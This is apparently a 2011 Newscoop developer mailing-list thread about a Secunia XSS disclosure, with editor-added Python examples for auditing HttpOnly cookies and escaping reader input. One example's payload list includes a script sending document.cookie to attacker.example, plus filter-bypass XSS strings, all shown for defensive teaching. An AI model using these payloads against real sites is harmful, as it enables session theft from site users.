A third-party researcher has discovered a vulnerability in
Newscoop, which can be exploited by malicious people to conduct
cross-site scripting attacks.
We have confirmed the vulnerability in version 3.5.0 and are
contacting you to attempt a coordinated disclosure. We have reserved
Secunia Advisory SA43152 and set a preliminary release date of February
16th, 2011 for the publication of our advisory.
Please provide us with the contact details of your security team so we
can provide the vulnerability details.
Kind regards,
--
Tiago Seco
Junior Security Specialist
Secunia
Weidekampsgade 14 A
DK-2300 Copenhagen S
Denmark
In addition, I'd like to inform you that Newscoop has administration session cookies with the HTTPOnly parameter (introduced in the 3.4.2 release). It prevents session grabbing via any injected code: JavaScript has no access to session information.
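Worked example, added here by the editor and not part of the original thread or of Newscoop's code: a small audit that parses Set-Cookie headers and flags session-looking cookies that lack the HttpOnly (and Secure) attribute, which is the check one would run against a Newscoop instance to confirm the post above. The header lines are constructed to resemble what a PHP application emits; PHPSESSID is PHP's default session cookie name, the other cookie names and the name heuristic are assumptions.

```python
"""Audit Set-Cookie headers for session cookies that lack HttpOnly (and Secure).

Added example, not Newscoop's code. The header lines below are constructed
to resemble what a PHP application emits; PHPSESSID is PHP's default session
cookie name, the other cookie names are hypothetical.
"""

# Constructed sample headers, one Set-Cookie per line, as `curl -i` would
# show them. They were not captured from a real Newscoop install.
SAMPLE_HEADERS = [
    "Set-Cookie: PHPSESSID=3f9a1c; path=/; HttpOnly",
    "Set-Cookie: PHPSESSID=3f9a1c; path=/",
    "Set-Cookie: admin_session=ab12; path=/admin; Secure; HttpOnly",
    "Set-Cookie: remember_me=xyz; path=/; Secure",
    "Set-Cookie: lang=en; path=/",
]

# Name fragments that suggest a cookie carries session or auth state
# (heuristic chosen for this example).
SESSION_NAME_HINTS = ("sess", "sid", "auth", "token", "remember")


def parse_set_cookie(header_line):
    """Split 'Set-Cookie: name=value; Attr; Attr=val' into (name, value, attrs).

    attrs maps lower-cased attribute names to their value, or to True for
    bare flags such as HttpOnly and Secure. A hand-rolled parser is used so
    the flag handling is explicit rather than hidden inside a library.
    """
    field, sep, body = header_line.partition(":")
    if not sep or field.strip().lower() != "set-cookie":
        raise ValueError("not a Set-Cookie header: %r" % header_line)
    parts = [p.strip() for p in body.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        if not part:
            continue
        key, eq, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip() if eq else True
    return name.strip(), value.strip(), attrs


def looks_like_session_cookie(name):
    """Heuristic: does the cookie name hint at session or auth state?"""
    lowered = name.lower()
    return any(hint in lowered for hint in SESSION_NAME_HINTS)


def audit_cookie(header_line):
    """Return a list of findings for one Set-Cookie header; empty if fine."""
    name, _, attrs = parse_set_cookie(header_line)
    findings = []
    if not looks_like_session_cookie(name):
        return findings  # not a session cookie; the flags are optional
    if attrs.get("httponly") is not True:
        findings.append("%s: missing HttpOnly (readable via document.cookie)" % name)
    if attrs.get("secure") is not True:
        findings.append("%s: missing Secure (sent over plain HTTP)" % name)
    return findings


def audit_headers(header_lines):
    """Audit every Set-Cookie line in a response; other headers are skipped."""
    report = []
    for line in header_lines:
        if line.lower().startswith("set-cookie:"):
            report.extend(audit_cookie(line))
    return report


if __name__ == "__main__":
    for finding in audit_headers(SAMPLE_HEADERS):
        print(finding)
```

Feed it the raw response headers from `curl -i` against the admin login. On the PHP side the equivalent setting is `session.cookie_httponly = 1` in php.ini (or `ini_set('session.cookie_httponly', '1')` before `session_start()`), and the `httponly` argument of `setcookie()` for non-session cookies. One caveat worth keeping in mind: HttpOnly only stops injected script from reading the cookie. Script running in an administrator's browser can still issue requests in that session, because the browser attaches the cookie itself, so the flag narrows the impact of an admin-side XSS rather than removing it.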
The latest cross-site scripting vulnerability was on the frontend, not admin: a
reader could write comments that contain JavaScript code. This was fixed in
3.5.0. The same possibility exists for the subscriber data form, which was
not updated yet to filter out JavaScript. The problem is minor though; I
never heard of any site using the template-based subscriber form to allow
their readers to update personal data.
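Worked example, added by the editor and not Newscoop's code, for the comment and subscriber-form cases described in the post above: each reader-supplied field is encoded for the HTML context it lands in (text node, attribute value, href), which is the approach that holds up, shown beside the kind of blocklist filter that "filtering out JavaScript" usually means and the payloads that slip past it. The field names, the page template and the payloads are constructed for illustration.

```python
"""Escape reader-supplied fields for the HTML context they land in.

Added example, not Newscoop's code. The comment/subscriber field names and
the page template are hypothetical; naive_script_filter() is included only
to show why stripping <script> tags is not enough.
"""
import html
import re
from urllib.parse import urlsplit

# Constructed payloads of the kind a reader could submit in a comment or a
# subscriber profile field.
PAYLOADS = [
    '<script>location="http://attacker.example/?c="+document.cookie</script>',
    '<img src=x onerror=alert(1)>',
    '" onmouseover="alert(1)',
    '<scr<script>ipt>alert(1)</script>',
]


def naive_script_filter(text):
    """Blocklist approach: remove <script> and </script> tags and hope.

    Bypassed by event handlers on other tags, and by nested tags that
    reassemble into <script> after the inner match is removed.
    """
    return re.sub(r"<\s*/?\s*script[^>]*>", "", text, flags=re.I)


def escape_html_text(text):
    """Encode for text between tags: ampersand, angle brackets and both quotes."""
    return html.escape(text, quote=True)


def escape_attr(text):
    """Encode for a double-quoted attribute value; the same entity set applies."""
    return html.escape(text, quote=True)


def safe_url(text):
    """Allowlist for href values: absolute http(s) URLs or site-relative paths.

    Anything else (javascript:, data:, protocol-relative //host) becomes ''.
    """
    parts = urlsplit(text.strip())
    if parts.scheme in ("http", "https") and parts.netloc:
        return parts.geturl()
    if not parts.scheme and not parts.netloc and parts.path.startswith("/"):
        return parts.geturl()
    return ""


def render_comment(author, body, website):
    """Render one comment; every field is encoded for the context it lands in."""
    return '<div class="comment"><a href="{href}">{author}</a>: {body}</div>'.format(
        href=escape_attr(safe_url(website)),
        author=escape_html_text(author),
        body=escape_html_text(body),
    )


def render_subscriber_fields(fields):
    """Render subscriber profile fields (hypothetical names) as a definition list."""
    rows = "".join(
        "<dt>{}</dt><dd>{}</dd>".format(escape_html_text(k), escape_html_text(v))
        for k, v in fields.items()
    )
    return "<dl>{}</dl>".format(rows)


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("filter :", naive_script_filter(payload))
        print("escape :", escape_html_text(payload))
    print(render_comment("reader", PAYLOADS[1], "javascript:alert(1)"))
    print(render_subscriber_fields({"name": PAYLOADS[2], "city": "Cluj-Napoca"}))
```

The point of the pairing: the blocklist leaves `<img src=x onerror=alert(1)>` untouched and turns `<scr<script>ipt>alert(1)</script>` into a working `<script>` tag, while entity encoding makes every payload inert regardless of what it contains. The one field that encoding alone cannot make safe is a URL, since `javascript:` is a perfectly well-formed attribute value; that field needs the scheme allowlist in `safe_url()`.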
> In addition I'd like to inform that Newscoop has administration session
> cookies with HTTPOnly parameter (was introduced in 3.4.2 release). It
> prevents a session grabbing via any injected code - javascript has no access
> to session information.
>
True, as Ofir said... there was an XSS problem re: Comments; Ofir
reported it... and while fixing it I found a couple more, also fixed.
One more was fixed by Martin, and I think he also fixed the problem
with Subscribers that Mugur is mentioning.
On Wed, Feb 2, 2011 at 8:04 PM, Mugur Rus
<newscoop-dev@lists.sourcefabric.org> wrote:
>
> The latest cross-site scripting vulnerability was on the frontend, not admin: a
> reader could write comments that contain Javascript code - this was fixed in
> 3.5.0. The same possibility exists for the subscriber data form - this was
> not updated yet to filter out Javascript. The problem is minor though, I
> never heard of any site using the template based subscriber form to allow
> their readers to update personal data.
>
> Mugur Rus
> Senior Software Developer, Sourcefabric
> mugur.rus@sourcefabric.org
>
> Cluj-Napoca, Romania
> +40 (0)720 528408
> Skype: mugur_rus
>
> http://www.sourcefabric.org
> http://www.twitter.com/Sourcefabric
>
>
>
> On Wed, Feb 2, 2011 at 8:58 PM, Andrey Podshivalov <
> newscoop-dev@lists.sourcefabric.org> wrote:
>
> > In addition I'd like to inform that Newscoop has administration session
> > cookies with HTTPOnly parameter (was introduced in 3.4.2 release). It
> > prevents a session grabbing via any injected code - javascript has no access
> > to session information.
> >
>
>